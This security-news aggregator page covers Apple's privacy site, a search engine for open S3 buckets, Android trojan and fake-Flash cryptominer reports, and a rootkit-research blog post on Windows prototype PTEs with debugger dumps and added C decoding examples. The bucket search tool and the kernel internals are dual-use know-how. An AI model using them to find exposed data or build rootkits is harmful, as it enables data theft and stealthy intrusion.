
E Hacking News – Latest Hacker News and IT Security News: Apple Launches Privacy Website; Focus on the Protection of Users' Personal Data





On Wednesday Apple launched a refreshed privacy website, https://www.apple.com/privacy/, updating the minisite to educate customers about how the company tries to safeguard their personal data across all of its products and services.

The privacy minisite covers a variety of areas, offering users as much information as possible about the iPhone maker's approach to handling and securing user data. Given the amount of data stored on an iPhone, iPad or Mac, Apple is keen to explain its practices to its user base, with the goal of building trust between the company and the people who buy its products and services.

The website advises users on how to protect their information, gives them new ways to understand Apple's "privacy is a fundamental human right" philosophy, and helps them manage their data appropriately.

To minimise the personal data it collects, Apple builds iOS and macOS devices to process data locally, to gather only purpose-specific data, and to randomise information so that it is not identifiable at a granular level. Work that many companies do in the cloud on their own servers, Apple does on the device, thanks to powerful chips such as the A12 Bionic.

The Opening Message on the new site –
“At Apple, we believe privacy is a fundamental human right. And so much of your personal information — information you have a right to keep private — lives on your Apple devices. Your heart rate after a run. Which news stories you read first. Where you bought your last coffee. What websites you visit. Who you call, email, or message. Every Apple product is designed from the ground up to protect that information. And to empower you to choose what you share and with whom.”

On the new website Apple once again makes clear that it requests personal information only where the new "Information and Security" icon appears; services where the icon does not appear do not require personal information from users.



E Hacking News - Latest Hacker News and IT Security News

/r/netsec – Information Security News & Discussion: buckets.grayhatwarfare.com – open s3 buckets search engine is updated!

Hello,

Since you guys loved us so much, we really tried our best to keep up with the expectations.

We are happy to announce the launch of the new version of the tool.

What's new:

  • A lot of you asked to be able to ignore buckets on the search results. From today you can do that.
  • You can now sort results and bucket contents by size.
  • Search was limited to filename. Now keywords can be matched in the directory of the file.
  • Sometimes files are listed but are not accessible. Not accessible files are noted as such to save you time clicking.
  • Project is completely rewritten from Slim Framework to Symfony.

Try it here: https://buckets.grayhatwarfare.com/

If you don't know what grayhatwarfare.com is you can read this: https://medium.com/@grayhatwarfare/how-to-search-for-open-amazon-s3-buckets-and-their-contents-https-buckets-grayhatwarfare-com-577b7b437e01

More info on the release and a peek at what's to come: https://blog.grayhatwarfare.com/2018/10/12/buckets-grayhatwarfare-com-open-s3-buckets-search-engine-is-updated/

Thanks for the support!

submitted by /u/grayhatwarfare

/r/netsec - Information Security News & Discussion

CYBER ARMS – Computer Security: Basic Security Testing with Kali Linux Giveaway Contest

Want a chance to get a signed copy of my latest Kali Linux book? I am giving away a total of 10 signed copies of “Basic Security Testing with Kali Linux, 3rd Edition”!

Simply follow, like and share this article, or my official Twitter or Instagram announcement, for a chance to win a signed copy of my new book!

10 lucky winners will be randomly selected on October 31st.

The Contest is for those living in the United States only. I may do another one for international readers in the future.

Liking this article & sharing the Official Contest announcements on Twitter and Instagram will increase your chances of winning.  Winners will be notified on October 31st. If a winner cannot be notified or does not respond by the end of the first week of November, another winner will be picked.

Good luck!

 
CYBER ARMS – Computer Security

Securosis Blog: Disrupt:Ops: What Security Managers Need to Know About Amazon S3 Exposures (2/2)

Our first Disrupt:Ops post discussed how exposure of S3 data becomes such a problem, with some details on how buckets become public in the first place. This post goes a bit deeper, before laying a foundation for how to manage S3 to avoid these mistakes yourself.

- Rich

Securosis Blog

Matt Flynn: Information Security | Identity & Access Mgmt.: Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Matt Flynn: Information Security | Identity & Access Mgmt.

E Hacking News – Latest Hacker News and IT Security News: A Trojan App on Google Play Store Stealing Users Sensitive Data





Security researchers at Cisco Talos have discovered a piece of Android malware named GPlayed. It masquerades as a Google Play Marketplace application, with an icon and branding almost indistinguishable from the real Google Play store and its companion apps, so that users are tricked into installing it on their phones and then lose sensitive data to the operators.

The risk is that many unsuspecting users may install the app on the assumption that it is a legitimate Google application and end up paying a heavy price.

Although the trojan is not yet live on the Google Play store, it is capable of exfiltrating payment card and banking details stored on the phone, and it can turn into full-time spyware that tracks the victim's location.

"What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed," Cisco Talos report said.




Talos added that its analysis indicates the trojan is still in a testing stage, but that, given its potential, every mobile user should be aware of GPlayed. Mobile developers have recently begun to bypass traditional app stores and deliver their software directly through their own channels; GPlayed is an example of where this can go wrong, especially when a user cannot tell a fake app from a real one.

Despite Google's strict measures to keep Android malware out of the Play store, those measures cannot reliably recognise trojans hidden inside apparently legitimate applications. Android users are therefore advised to be cautious about installing apps that resemble Google's own.




TheXploit: He Needed to Recharge My AC Unit

My air conditioner is a lifeline for me in the summer months here in New York City. Even when the temperature is in the 70s, I like to turn it on because my house can become quite stuffy. When the temperatures are in the 80s or 90s, it becomes an absolute necessity. Well, I had […]

TheXploit

E Hacking News – Latest Hacker News and IT Security News: Adobe Flash Updates: Camouflaging Crypto-mining Malware!




Since early August, cryptocurrency thieves have been hiding mining malware inside what appear to be genuine Adobe Flash updates.

According to security researchers, the mining activity was driven by a fake updater that has been in circulation since early August. While claiming to install a legitimate Flash update, the fraudulent file drops the XMRig cryptocurrency miner onto the device to mine Monero, the most sought-after privacy coin.

The researchers found over 110 samples of such fake updates, all with file names beginning "Adobe Flash Player". Users are presumably directed to these files through deceptive URLs.

The fake updater really does download and install an authentic Flash update, which is what makes it look legitimate, while the miner connects to a Monero mining pool and starts work. How victims are initially lured to the updater is still not known.

When examined, the spoofed URLs themselves appeared perfectly harmless and raised no suspicion.

As is usual for mining malware, the infected system does the work and all mined Monero is sent to a single wallet.

The most insidious part is that the user has no idea the Flash update is illegitimate, because the malware is hidden behind a real update, while the CPU runs flat out mining cryptocurrency for the attackers.

Monero has long been the first choice of cyber criminals, so it is no surprise that, according to one rough estimate, more than $250,000 worth of Monero is mined every month through fraudulent browser-based mining scripts.

Adobe has not commented on the matter so far, but several research organisations are working on reducing Monero-related cybercrime.



A blog about rootkits research and the Windows kernel: What is a Proto-PTE and how Windows VMM works with it

A Proto-PTE (Prototype PTE, PPTE) is a basic building block of the Windows VMM (Virtual Memory Manager) with whose help the OS can work with memory-mapped files (or Sections, in Native/NT kernel API terms). From what I have learned in discussions with Windows Internals researchers, and from my own experience, the PPTE is the trickiest thing a researcher can face. But in fact there is nothing complicated about understanding the PPTE concept if we look at it from the right side. Honestly, it was already eleven years ago that I defended my coursework at the university, titled "Inside Windows XP VMM". I have uploaded its Russian edition to the famous KM forum. It was written in SoftICE times, when you could break Windows kernel execution with Ctrl-X and debug a local system without any remote setup. :)
That coursework covered a lot of VMM subsystems, including Hyperspace, PTEs, Session space, WSL, the PFN database, Sections and Cache internals. But, unfortunately, it was oriented only to the x86 architecture. So I took my chapters dedicated to PTEs and Sections and adapted them for today's x64 architecture. I started learning Windows Internals when the 2nd edition of the book series was released (Inside Windows 2000). Windows Internals and rootkits are both still my favourite research directions today, as they were more than ten years ago.

A PPTE (which is actually a kind of software PTE, SPTE) is the basic block the VMM uses to attach a new view of an already mapped section to a specific process. The term SPTE simply means that the OS itself defines the layout of such an always-invalid PTE, i.e. the CPU knows nothing about that layout. The CPU's only job when it encounters such an invalid PTE is to interrupt the current thread and transfer execution to the NT kernel's page-fault handler KiPageFault (KiTrap0E on x86), which formally belongs to the trap dispatcher and the VMM.

To understand how Windows works with PPTEs, let's pay attention to the following structures.
  • Section (nt!_SECTION). The kernel structure that describes a section object.
  • Segment (nt!_SEGMENT). The core structure of the PPTE architecture; it owns the PPTE table.
  • Control Area (CA, nt!_CONTROL_AREA). Together with the SEGMENT, a key structure of a Section and for understanding how PPTEs work. The control area stores the information the VMM needs to perform I/O on the backing file, i.e. to read data from it or write data back to it.
  • Subsection (nt!_SUBSECTION). A structure containing the information needed to compute an offset inside the mapped file from a PPTE.
Let's talk about each of them in more detail.
As the picture above shows, clients (threads) in separate processes can create sections for one specific file, for example to execute it: every Windows process uses kernel32.dll, which is mapped as a section in each of them. The basic SECTION structure represents a kernel object that is created when a thread creates a memory-mapped file. If a section is created for a file for the first time, the OS has to initialise the related kernel structures, SEGMENT and CONTROL_AREA, that describe the memory-mapped file, including the PPTE table. If, on the other hand, a thread creates a section for a file that already has these VMM structures, the new section simply attaches to the existing SEGMENT. When a client calls the Windows API to map a range of the file into memory, the VMM takes the PTEs that correspond to the allocated virtual memory and points them at the PPTEs; such software PTEs are then called PTEs Pointing to Prototype (PTEPP).

Let's look at major fields of the section structure.


typedef struct _SECTION
{
      struct _RTL_BALANCED_NODE SectionNode;
      UINT64 StartingVpn; //starting virtual page number of mapping
      UINT64 EndingVpn; //ending virtual page number
      union
      {
            struct _CONTROL_AREA* ControlArea; //ptr to corresponding control area
            struct _FILE_OBJECT* FileObject; //or to file object
            struct
            {
                  UINT64 RemoteImageFileObject : 1; //for remote files cases
                  UINT64 RemoteDataFileObject : 1;
            };
      }u1;
      UINT64 SizeOfSection; //size of section
      union
      {
            ULONG32 LongFlags;
            struct _MMSECTION_FLAGS Flags; //flags from ZwCreateSection
      }u;
      struct
      {
            ULONG32 InitialPageProtection : 12;
            ULONG32 SessionId : 19;
            ULONG32 NoValidationNeeded : 1;
      };
}SECTION, *PSECTION;

Below you can see the control area (CA) structure.

typedef struct _CONTROL_AREA
{
      struct _SEGMENT* Segment; //ptr to corresponding segment
      union
      {
            struct _LIST_ENTRY ListHead;
            VOID* AweContext;
      };
      UINT64 NumberOfSectionReferences;
      UINT64 NumberOfPfnReferences;
      UINT64 NumberOfMappedViews; //count of sections that have been mapped with this CA
      UINT64 NumberOfUserReferences;
      ...
      union
      {
            struct
            {
                  union
                  {
                        ULONG32 NumberOfSystemCacheViews;
                        ULONG32 ImageRelocationStartBit;
                  };
                  union
                  {
                        LONG32 WritableUserReferences;
                        struct
                        {
                              ULONG32 ImageRelocationSizeIn64k : 16;
                              ULONG32 LargePage : 1;
                              ULONG32 AweSection : 1;
                              ULONG32 SystemImage : 1;
                              ULONG32 StrongCode : 2;
                              ULONG32 CantMove : 1;
                              ULONG32 BitMap : 2;
                              ULONG32 ImageActive : 1;
                              ULONG32 ImageBaseOkToReuse : 1;
                        };
                  };
                  union
                  {
                        ULONG32 FlushInProgressCount;
                        ULONG32 NumberOfSubsections;
                        struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
                  };
            }e2;
      }u2;
      ...
}CONTROL_AREA, *PCONTROL_AREA; //defines section's properties that are actual for all clients

When a client requests an unmap-view operation, Windows just removes the links to the corresponding PPTEs from the process PTEs that describe the view of the mapped section. So the PPTE is a convenient and universal interface for attaching a view to a specific process address space and detaching it again, and this is its main purpose. The Segment structure holds the pointer to the PPTE table, as shown below.

typedef struct _SEGMENT
{
      struct _CONTROL_AREA* ControlArea; //-> ptr to corresponding CA
      ULONG32      TotalNumberOfPtes;
      struct _SEGMENT_FLAGS SegmentFlags;
      UINT64 NumberOfCommittedPages;
      UINT64 SizeOfSegment;
      ...
      struct _MMPTE* PrototypePte; //-> PPTE table that are pointing to Subsections
}SEGMENT, *PSEGMENT;

Another key structure for understanding how Windows uses PPTEs to work with a Section (memory-mapped file) is the so-called Subsection (nt!_SUBSECTION). A subsection contains the information needed to compute an offset inside the mapped file from the PPTEs that describe that file. For an ordinary data file there is (with some exceptions) a single subsection, but for an executable PE file there is one subsection per PE section plus one more for the PE header. A subsection also stores the memory protection for all PTEs that cover a given PE section, i.e. the VMM assigns the protection constant from the Subsection structure to every PTE the subsection describes.

Every PPTE refers to a specific subsection: when a section is mapped as data, all PPTEs point to the single subsection; when it is mapped as an image, the PPTEs of each PE section point to that section's subsection. A subsection holds a starting-sector field that gives the position of the PE section inside the file (taken from the PE header: raw section offset / SECTOR_SIZE, with SECTOR_SIZE = 512). It also holds a pointer to its first PPTE inside the Segment's PPTE table and the number of PPTEs it owns, i.e. the number of pages of the PE section, its VirtualSize rounded up to a multiple of PAGE_SIZE.

Given the address of a PPTE, we can easily compute the offset inside the file that this PTE describes, from its distance from the subsection's first PPTE. If Pte is a pointer to the current PPTE and Subsection is the address of its subsection, the file offset is:

((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(MMPTE)) << PAGE_SHIFT) + Subsection->StartingSector * SECTOR_SIZE

Note the parentheses around the shift: in C, + binds tighter than <<, so without them the expression would shift by (PAGE_SHIFT + offset). The first PPTE a subsection describes is FirstPte = &Subsection->SubsectionBase[0], and the end of its range is LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection] (one past the last PPTE). So for a PPTE Pte that belongs to the subsection, &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].

typedef struct _SUBSECTION
{
      struct _CONTROL_AREA* ControlArea; //-> owning control area
      struct _MMPTE* SubsectionBase; //-> first PPTE of this subsection in the Segment's PPTE table
      struct _SUBSECTION* NextSubsection; //-> next subsection of the same CA (one per PE section)
      ...
      union
      {
            ULONG32 LongFlags;
            struct _MMSUBSECTION_FLAGS SubsectionFlags;
      }u;
      ULONG32 StartingSector; //first sector of this range in the file (raw offset / 512)
      ULONG32 NumberOfFullSectors; //raw size of the range in sectors
      ULONG32 PtesInSubsection; //number of PPTEs (pages) this subsection describes
      ...
}SUBSECTION, *PSUBSECTION;

typedef struct _MMSUBSECTION_FLAGS
{
      struct
      {
            UINT16 SubsectionAccessed : 1;
            UINT16 Protection : 5; //MM_* protection applied to every PTE of the subsection
            UINT16 StartingSector : 10;
      };
      struct
      {
            UINT16 SubsectionStatic : 1;
            UINT16 GlobalMemory : 1;
            UINT16 Spare : 1;
            UINT16 OnDereferenceList : 1;
            UINT16 SectorEndOffset : 12;
      };
}MMSUBSECTION_FLAGS, *PMMSUBSECTION_FLAGS;
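The offset formula and the range check above, as an added runnable example (this is not code from the original post): a user-mode model of the SUBSECTION fields the formula needs, fed with the values from the post's own windbg dumps of ole32.dll ("!ca 817ab818") and NTUSER.DAT ("dt _subsection 81853038") as constructed input. It walks the NextSubsection chain to find the subsection that owns a PPTE, computes the file offset that PPTE describes, and goes the other way from a file offset back to the PPTE. Kernel addresses are kept as plain integers and never dereferenced; the PTE size is passed in (4 bytes on x86 non-PAE as in the XP dumps, 8 on x64); the struct, the function names and the -1/0 "not found" conventions are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT   12
#define SECTOR_SIZE  512u
#define PTE_SIZE_X86 4u   /* sizeof(MMPTE) on x86 non-PAE, as in the XP dumps */
#define PTE_SIZE_X64 8u   /* sizeof(MMPTE) on x64 */

/*
 * Constructed user-mode model of the nt!_SUBSECTION fields used by the
 * offset formula. Addresses are integers, so nothing here touches kernel
 * memory; the arithmetic is what is being checked against the dumps.
 */
typedef struct subsection {
    uint64_t subsection_base;        /* SubsectionBase: address of the first PPTE     */
    uint32_t starting_sector;        /* StartingSector: raw file offset / 512         */
    uint32_t number_of_full_sectors; /* NumberOfFullSectors: raw size / 512           */
    uint32_t ptes_in_subsection;     /* PtesInSubsection: pages this subsection maps  */
    uint32_t protection;             /* MM_* protection applied to those pages        */
    struct subsection *next;         /* NextSubsection                                */
} subsection_t;

/* &SubsectionBase[0] <= pte < &SubsectionBase[PtesInSubsection] */
bool pte_in_subsection(const subsection_t *s, uint64_t pte, unsigned pte_size)
{
    uint64_t end = s->subsection_base + (uint64_t)s->ptes_in_subsection * pte_size;
    return pte >= s->subsection_base && pte < end;
}

/* Walk the NextSubsection chain to the subsection whose PPTE range holds pte. */
const subsection_t *find_subsection(const subsection_t *head, uint64_t pte, unsigned pte_size)
{
    for (const subsection_t *s = head; s != NULL; s = s->next)
        if (pte_in_subsection(s, pte, pte_size))
            return s;
    return NULL;
}

/*
 * File offset of the page a PPTE describes:
 *   ((pte - SubsectionBase) / sizeof(MMPTE)) << PAGE_SHIFT + StartingSector * SECTOR_SIZE
 * with the shift parenthesised, because '+' binds tighter than '<<' in C.
 * Returns -1 when pte does not belong to this subsection.
 */
int64_t ppte_to_file_offset(const subsection_t *s, uint64_t pte, unsigned pte_size)
{
    if (!pte_in_subsection(s, pte, pte_size))
        return -1;
    uint64_t index = (pte - s->subsection_base) / pte_size;
    return (int64_t)((index << PAGE_SHIFT) + (uint64_t)s->starting_sector * SECTOR_SIZE);
}

/*
 * Inverse: the PPTE that describes a raw file offset. The lookup uses the
 * on-disk extent [StartingSector, StartingSector + NumberOfFullSectors)
 * because the page extents of adjacent subsections overlap (the header
 * subsection owns a whole page but only two sectors of the file).
 * Returns 0 when no subsection covers the offset.
 */
uint64_t file_offset_to_ppte(const subsection_t *head, uint64_t offset, unsigned pte_size)
{
    for (const subsection_t *s = head; s != NULL; s = s->next) {
        uint64_t start = (uint64_t)s->starting_sector * SECTOR_SIZE;
        uint64_t end   = start + (uint64_t)s->number_of_full_sectors * SECTOR_SIZE;
        if (offset >= start && offset < end)
            return s->subsection_base + ((offset - start) >> PAGE_SHIFT) * pte_size;
    }
    return 0;
}

/* ole32.dll mapped as image: the six subsections of the "!ca 817ab818" dump (XP SP3 x86). */
subsection_t ole32_subsections[6] = {
    { 0xe172ead8, 0x000, 0x002, 0x001, 1, &ole32_subsections[1] }, /* PE header      */
    { 0xe172eadc, 0x002, 0x8f8, 0x11f, 3, &ole32_subsections[2] }, /* .text          */
    { 0xe172ef58, 0x8fa, 0x030, 0x006, 3, &ole32_subsections[3] }, /* .orpc          */
    { 0xe172ef70, 0x92a, 0x033, 0x007, 5, &ole32_subsections[4] }, /* data, CoW      */
    { 0xe172ef8c, 0x95d, 0x00c, 0x002, 1, &ole32_subsections[5] },
    { 0xe172ef94, 0x969, 0x069, 0x00e, 1, NULL },
};

/* NTUSER.DAT mapped as data: one subsection, from the "dt _subsection 81853038" dump. */
subsection_t ntuser_subsection = { 0xe15b7008, 0x000, 0x100, 0x100, 6, NULL };

int main(void)
{
    int n = 1;
    for (const subsection_t *s = ole32_subsections; s != NULL; s = s->next, n++)
        printf("subsection %d: first PPTE %#llx -> file offset %#llx (protection %u)\n",
               n, (unsigned long long)s->subsection_base,
               (unsigned long long)ppte_to_file_offset(s, s->subsection_base, PTE_SIZE_X86),
               (unsigned)s->protection);

    /* The cache-slot case from the post: PPTE 0xE15B7208 describes file offset 0x80000. */
    printf("NTUSER.DAT PPTE 0xe15b7208 -> file offset %#llx\n",
           (unsigned long long)ppte_to_file_offset(&ntuser_subsection, 0xe15b7208, PTE_SIZE_X86));
    return 0;
}
```

The inverse lookup deliberately uses the sector extent rather than the page extent: for an image the header subsection covers a full page of virtual memory but only 0x400 bytes of file, so file offset 0x400 must resolve to the first PPTE of the .text subsection, not to the second page of the header.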

Let's take a real example.

> !process 0 0

PROCESS ffffca0cabb485c0
    SessionId: 0  Cid: 07d0    Peb: ef0697b000  ParentCid: 0338
    DirBase: 13692000  ObjectTable: ffffb981ce2b7380  HandleCount: 149.
    Image: VSSVC.exe

> !handle 0 3 ffffca0cabb485c0

0030: Object: ffffb981c8277a50  GrantedAccess: 00000003 (Inherit) Entry: ffffb981ce3c70c0
Object: ffffb981c8277a50  Type: (ffffca0ca8c71c50) Directory
    ObjectHeader: ffffb981c8277a20 (new version)
        HandleCount: 43  PointerCount: 1407269
        Directory Object: ffffb981c7c16b20  Name: KnownDlls

        Hash Address          Type                      Name
        ---- -------          ----                      ----
         00  ffffb981c8287c10 Section                   kernel32.dll

> !object ffffb981c8287c10

Object: ffffb981c8287c10  Type: (ffffca0ca8d0ada0) Section
    ObjectHeader: ffffb981c8287be0 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: ffffb981c8277a50  Name: kernel32.dll

> dt _SECTION ffffb981c8287c10 -r1

nt!_SECTION
   +0x000 SectionNode      : _RTL_BALANCED_NODE
    ...
   +0x018 StartingVpn      : 0
   +0x020 EndingVpn        : 0
   +0x028 u1               : <unnamed-tag>
      +0x000 ControlArea      : 0xffffca0c`aa900880 _CONTROL_AREA
      +0x000 FileObject       : 0xffffca0c`aa900880 _FILE_OBJECT
      +0x000 RemoteImageFileObject : 0y0
      +0x000 RemoteDataFileObject : 0y0
   +0x030 SizeOfSection    : 0xae000
 ...

> !ca 0xffffca0c`aa900880

ControlArea  @ ffffca0caa900880
  Segment      ffffb981c8297cb0  Flink      ffffca0cabb4d230  Blink        ffffca0caab19e00
  Section Ref                 1  Pfn Ref                  6f  Mapped Views               2a
  User Ref                   2b  WaitForDel                0  Flush Count               a88
  File Object  ffffca0caa900c90  ModWriteCount             0  System Views             348f
  WritableRefs           c0000b 
  Flags (a0) Image File

      \Windows\System32\kernel32.dll

Segment @ ffffb981c8297cb0
  ControlArea     ffffca0caa900880  BasedAddress  00007ffbcb640000
  Total Ptes                    ae
  Segment Size               ae000  Committed                    0
  Image Commit                   2  Image Info    ffffb981c8297cf8
  ProtoPtes       ffffb981c7f24a90
  Flags (c4820000) ProtectionMask

> dq ffffb981c7f24a90

ffffb981`c7f24a90  8a000000`37295121 00000000`2c624860
ffffb981`c7f24aa0  0a000000`2c625121 0a000000`2c626121
ffffb981`c7f24ab0  0a000000`2c627121 0a000000`2c628121 -> Subsection address

We can also take a real example from my coursework on 32-bit Windows XP SP3. Let's take a specific system cache slot, because PPTEs for a Ring 3 process may not be created until someone actually touches the mapping. Print the list of slots; on my machine the following items exist. In this case the cache manager has mapped the registry hive file NTUSER.DAT as a data (binary) file, so only one subsection exists for it.

Vacb #186    0x81936170 -> 0xc7080000
File: 0x81749818
Offset: 0x00080000
\Documents and Settings\Art\NTUSER.DAT

We can see that this slot maps the file at offset 0x80000 to base address 0xc7080000.

0: kd> !pte 0xc7080000
               VA c7080000
PDE at   C0300C70        PTE at C031C200
contains 01CF0963      contains 0554A921
pfn 1cf0 -G-DA--KWEV    pfn 554a -G--A—KREV

The PTE is valid, so we can recover the content of the PPTE from the PFN database.

0: kd> !pfn 554a
    PFN 0000554A at address 8107FEF0
    flink       000018C8  blink / share count 00000001  pteaddress E15B7208
    reference count 0001   Cached     color 0
    restore pte 86D204CE  containing page        00496E  Active      P      
      Shared         
   
Now we know that the PPTE address is 0xE15B7208 and that its original content (saved in the PFN entry as "restore pte") is 0x86D204CE. We can translate it to a subsection address with the formula:

SubsectionAddress = MmNonPagedPoolStart + (SubsectionIndex << 3), where SubsectionIndex = (SubsectionAddressHigh << 4) | SubsectionAddressLow.

This is the x86 non-PAE subsection form of a prototype PTE (nt!_MMPTE_SUBSECTION), decoded field by field:

86D204CE = 1 | 00001101101001000000 | 1 | 00110 | 0111 | 0
           bit 31:     WhichPool = 1 (the subsection lives in nonpaged pool)
           bits 11-30: SubsectionAddressHigh = 00001101101001000000
           bit 10:     Prototype = 1 (the PTE refers to a subsection)
           bits 5-9:   Protection = 00110 = 6 (MM_EXECUTE_READWRITE)
           bits 1-4:   SubsectionAddressLow = 0111
           bit 0:      Valid = 0 (not present as far as the CPU is concerned)
SubsectionAddressHigh:SubsectionAddressLow = 000011011010010000000111 = DA407
DA407 * 8 + 81181000 = 6D2038 + 81181000 = 81853038
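The decoding above, as an added example in C (not code from the original post): it pulls the fields out of a 32-bit XP subsection-format prototype PTE and applies the formula to recover the SUBSECTION address, checking both the NTUSER.DAT value here and the ole32.dll value (0x862A8C62, subsection 0x817AB888) that appears further down the post. The field positions follow the bit split shown above, which is the x86 non-PAE nt!_MMPTE_SUBSECTION layout; MmNonPagedPoolStart = 0x81181000 is the value the post uses; the function and field names are this example's own, and only the WhichPool = 1 (nonpaged pool) case is modelled.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * x86 non-PAE nt!_MMPTE_SUBSECTION (Windows XP): the form a prototype PTE
 * takes while the page it describes is not resident.
 *   bit  0       Valid (0: not present for the CPU; the rest is kernel-defined)
 *   bits 1..4    SubsectionAddressLow
 *   bits 5..9    Protection (MM_* constant; the low 3 bits select the access type)
 *   bit  10      Prototype
 *   bits 11..30  SubsectionAddressHigh
 *   bit  31      WhichPool (1: the subsection lives in nonpaged pool)
 */
typedef struct {
    bool     valid;
    unsigned sub_addr_low;
    unsigned protection;
    bool     prototype;
    unsigned sub_addr_high;
    bool     which_pool;
} subsection_pte_t;

subsection_pte_t decode_subsection_pte(uint32_t pte)
{
    subsection_pte_t d;
    d.valid         = (pte >> 0)  & 0x1;
    d.sub_addr_low  = (pte >> 1)  & 0xF;
    d.protection    = (pte >> 5)  & 0x1F;
    d.prototype     = (pte >> 10) & 0x1;
    d.sub_addr_high = (pte >> 11) & 0xFFFFF;
    d.which_pool    = (pte >> 31) & 0x1;
    return d;
}

/*
 * SUBSECTION address:
 *   MmNonPagedPoolStart + (((SubsectionAddressHigh << 4) | SubsectionAddressLow) << 3)
 * Returns 0 for anything that is not a nonpaged-pool subsection PTE: a valid
 * hardware PTE, a non-prototype software PTE, or WhichPool == 0 (a different
 * base address, not modelled in this example).
 */
uint32_t subsection_address(uint32_t pte, uint32_t nonpaged_pool_start)
{
    subsection_pte_t d = decode_subsection_pte(pte);
    if (d.valid || !d.prototype || !d.which_pool)
        return 0;
    uint32_t index = (d.sub_addr_high << 4) | d.sub_addr_low;
    return nonpaged_pool_start + (index << 3);
}

/* Names of the MM_* access types encoded in the low three Protection bits. */
const char *protection_name(unsigned protection)
{
    static const char *const names[8] = {
        "MM_NOACCESS", "MM_READONLY", "MM_EXECUTE", "MM_EXECUTE_READ",
        "MM_READWRITE", "MM_WRITECOPY", "MM_EXECUTE_READWRITE", "MM_EXECUTE_WRITECOPY",
    };
    return names[protection & 0x7];
}

int main(void)
{
    /* The two "restore pte" values from the post's !pfn output, plus the valid
     * hardware PTE of the NTUSER.DAT cache slot to show the rejection path. */
    const uint32_t mm_nonpaged_pool_start = 0x81181000;
    const uint32_t samples[] = { 0x86D204CE, 0x862A8C62, 0x0554A921 };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        subsection_pte_t d = decode_subsection_pte(samples[i]);
        printf("%08X: valid=%u proto=%u pool=%u prot=%u (%s) subsection=%08X\n",
               samples[i], (unsigned)d.valid, (unsigned)d.prototype,
               (unsigned)d.which_pool, d.protection, protection_name(d.protection),
               subsection_address(samples[i], mm_nonpaged_pool_start));
    }
    return 0;
}
```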

Print a subsection.

> dt _subsection 81853038
nt!_SUBSECTION
   +0x000 ControlArea      : 0x81853008 _CONTROL_AREA
   +0x004 u                : __unnamed
   +0x008 StartingSector   : 0
   +0x00c NumberOfFullSectors : 0x100
   +0x010 SubsectionBase   : 0xe15b7008 _MMPTE
   +0x014 UnusedPtes       : 0
   +0x018 PtesInSubsection : 0x100
   +0x01c NextSubsection   : (null)

and its flags in detail:

+0x004 u                : __unnamed
      +0x000 LongFlags        : 0x60
      +0x000 SubsectionFlags  : _MMSUBSECTION_FLAGS
         +0x000 ReadOnly         : 0y0
         +0x000 ReadWrite        : 0y0
         +0x000 SubsectionStatic : 0y0
         +0x000 GlobalMemory     : 0y0
         +0x000 Protection       : 0y00110 (0x6) - MM_EXECUTE_READWRITE
         +0x000 LargePages       : 0y0
         +0x000 StartingSector4132 : 0y0000000000 (0)
         +0x000 SectorEndOffset  : 0y000000000000 (0)

Print control area.

> dt _control_area 0x81853008 
nt!_CONTROL_AREA
   +0x000 Segment          : 0xe1559ba0 _SEGMENT
   +0x004 DereferenceList  : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x00c NumberOfSectionReferences : 1
   +0x010 NumberOfPfnReferences : 0xe5
   +0x014 NumberOfMappedViews : 4
   +0x018 NumberOfSubsections : 1
   +0x01a FlushInProgressCount : 0
   +0x01c NumberOfUserReferences : 0
   +0x020 u                : __unnamed
   +0x024 FilePointer      : 0x81749818 _FILE_OBJECT
   +0x028 WaitingForDeletion : (null) 
   +0x02c ModifiedWriteCount : 0
   +0x02e NumberOfSystemCacheViews : 4

The number of subsections is 1, because the file was mapped as data.

As a result:
  • The offset at which the file was mapped into the cache slot: (E15B7208 - E15B7008) / 4 = 0x80 PPTEs, and (0x80 << 12) + 0 * 0x200 = 0x80000, as we saw in the VACB.
  • The protection bits grant maximum rights, MM_EXECUTE_READWRITE, as the PPTE Protection field shows: 00110, i.e. 6.
Let's look at something more interesting: the image (executable) section of ole32.dll.

> !ca 817ab818   

ControlArea  @ 817ab818
  Segment      e172eaa0  Flink      00000000  Blink        00000000
  Section Ref         1  Pfn Ref          8f  Mapped Views       13
  User Ref           14  WaitForDel        0  Flush Count         0
  File Object  81847da0  ModWriteCount     0  System Views        0

  Flags (90000a0) Image File HadUserReference Accessed
                  |-> mapped as image

      File: \WINDOWS\system32\ole32.dll

Segment @ e172eaa0
  ControlArea     817ab818  BasedAddress  774e0000
  Total Ptes           13d
  WriteUserRef           0  SizeOfSegment   13d000
  Committed              0  PTE Template  862a8c3a
  Based Addr      774e0000  Image Base           0
  Image Commit           7  Image Info    e172efd0
  ProtoPtes       e172ead8


Subsection 1 @ 817ab848
  ControlArea  817ab818  Starting Sector        0  Number Of Sectors    2
  Base Pte     e172ead8  Ptes In Subsect        1  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

Subsection 2 @ 817ab868
  ControlArea  817ab818  Starting Sector        2  Number Of Sectors  8f8
  Base Pte     e172eadc  Ptes In Subsect      11f  Unused Ptes          0
